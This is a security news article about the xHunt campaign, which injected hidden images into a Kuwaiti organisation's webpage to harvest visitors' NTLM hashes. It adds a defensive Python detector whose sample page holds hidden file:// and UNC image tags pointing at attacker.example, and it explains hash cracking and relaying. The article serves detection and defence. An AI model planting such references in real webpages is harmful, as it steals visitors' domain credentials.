xHunt Campaign Uses Organization’s Webpage as Watering Hole to Steal Customer Login Details

The xHunt campaign has been active since at least July 2018 and targets transportation and shipping organizations based in Kuwait.

The campaign was named xHunt because the attackers named their tools after characters from the anime series Hunter x Hunter.

xHunt Campaign Activities

Unit 42 researchers spotted new xHunt activity in which the attackers compromised a Kuwaiti organization’s webpage and used it as a watering hole.

Between June and December 2019 the attackers injected HTML into the website that referenced a hidden image file hosted on their own infrastructure. The injected code first pointed at microsofte-update[.]com and was later changed to point at learn-service[.]com.

The injected code was designed to harvest account credentials from the webpage’s visitors in the form of NTLM hashes. This is the classic forced-authentication trick: a hidden image whose source points at a remote host through a UNC or file:// path makes a Windows client try to fetch it over SMB, and the client answers the attacker’s NTLM challenge automatically with the logged-on user’s domain credentials, with nothing for the visitor to click or notice.
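As an added example (not code from the original article or from Unit 42), the following Python script checks a page’s HTML for the kind of injected reference described above: image, script or frame tags whose source is a file:// or raw UNC path to a remote host, or a hidden element that loads from a host outside an allow-list. The sample page and the hosts attacker.example, cdn.example and tracker.example are constructed for the demonstration and stand in for the real domains named in the article.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags whose remote reference a browser fetches automatically, without a click.
AUTO_FETCH = {"img": "src", "script": "src", "iframe": "src", "source": "src", "link": "href"}


class _RefCollector(HTMLParser):
    """Collects (tag, url, attrs) for every auto-fetching element in the document."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attr_name = AUTO_FETCH.get(tag)
        if attr_name is None:
            return
        attrs = dict(attrs)
        url = (attrs.get(attr_name) or "").strip()
        if url:
            self.refs.append((tag, url, attrs))


def is_hidden(attrs) -> bool:
    """Hidden elements are the watering-hole pattern: the visitor never sees the image load."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or attrs.get("width") == "0" or attrs.get("height") == "0" or "hidden" in attrs)


def find_forced_auth_refs(html: str, trusted_hosts):
    """Return findings for references that can trigger SMB/NTLM authentication or look injected."""
    parser = _RefCollector()
    parser.feed(html)
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for tag, url, attrs in parser.refs:
        if url.startswith("\\\\"):                      # raw UNC path: \\host\share\file
            host, scheme = url[2:].split("\\", 1)[0], "unc"
        else:
            parts = urlsplit(url)
            host, scheme = (parts.hostname or ""), parts.scheme.lower()
        host = host.lower()
        if scheme in ("unc", "file") and host:
            # Windows will try to open this over SMB and answer the server's NTLM challenge.
            findings.append({"tag": tag, "url": url, "severity": "high",
                             "reason": f"{scheme} reference to remote host {host} (forced NTLM authentication)"})
        elif host and host not in trusted and is_hidden(attrs):
            findings.append({"tag": tag, "url": url, "severity": "medium",
                             "reason": f"hidden element loads from untrusted host {host}"})
    return findings


# Constructed sample page: one injected file:// image, one raw UNC image, one hidden tracker.
SAMPLE_HTML = """
<html><body>
  <img src="/static/logo.png" alt="logo">
  <img src="https://cdn.example/banner.jpg" alt="banner">
  <img src="file://attacker.example/updates/image.jpg" style="display: none;">
  <img src="\\\\attacker.example\\share\\pixel.gif" width="0" height="0">
  <img src="https://tracker.example/p.gif" style="display:none">
</body></html>
"""

if __name__ == "__main__":
    for f in find_forced_auth_refs(SAMPLE_HTML, trusted_hosts={"cdn.example"}):
        print(f["severity"].upper(), f["tag"], f["url"], "-", f["reason"])
```

Run it against a saved copy of each public page on a schedule and diff the findings: a file:// or UNC reference is never legitimate on a public website, while the medium-severity hits need an allow-list of your CDN and analytics hosts to stay quiet.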

With the captured handshake (the server challenge plus the client’s NTLMv2 response) the attackers can crack the hash offline to recover the username and password, or relay the authentication in real time to another service that accepts NTLM. Cracking only succeeds against weak passwords, and relaying fails where the target enforces SMB signing or Extended Protection for Authentication, which is why blocking outbound SMB (TCP 445) at the perimeter and restricting outgoing NTLM through the “Network security: Restrict NTLM” policies are the standard defenses against this class of watering hole.

To confirm the behaviour, the researchers set up the Responder tool on a server and configured their lab environment so that the domain microsofte-update[.]com resolved to that server.

“We then visited the website from another system in our lab that had the HTML code injected and observed the Responder tool gathering the domain name, user name, IP address and NTLM hashes from the system on which we visited the website.”

Further DNS analysis around the Kuwaiti organization’s webpage revealed that a domain belonging to another organization within Kuwait also began resolving to infrastructure used by the xHunt operators, which points to that organization’s DNS records being redirected to attacker-controlled hosts rather than its web server being compromised.

Sakabota and Hisoka DNS Timeline

The DNS activity timeline figure for the Sakabota and Hisoka infrastructure is not reproduced here; its legend reads:

  • Top row – targeted organizations
  • Middle row – Infrastructure
  • Bottom row – xHunt domains

The attackers also obtained Let’s Encrypt TLS certificates whose names included the redirected domain. Once a domain resolves to hosts under the attacker’s control, passing the CA’s domain validation and obtaining a browser-trusted certificate is straightforward. Because Let’s Encrypt publishes every certificate it issues to Certificate Transparency logs, monitoring CT for certificates issued against your own domain names is a cheap way to detect this kind of DNS hijack.

Researchers believe the same threat actor group is behind both the Hisoka attack campaign and the xHunt attack campaign.



Gurubaran is a Security Consultant, Security Editor & Co-Founder of Cyber Security News & GBHackers On Security.
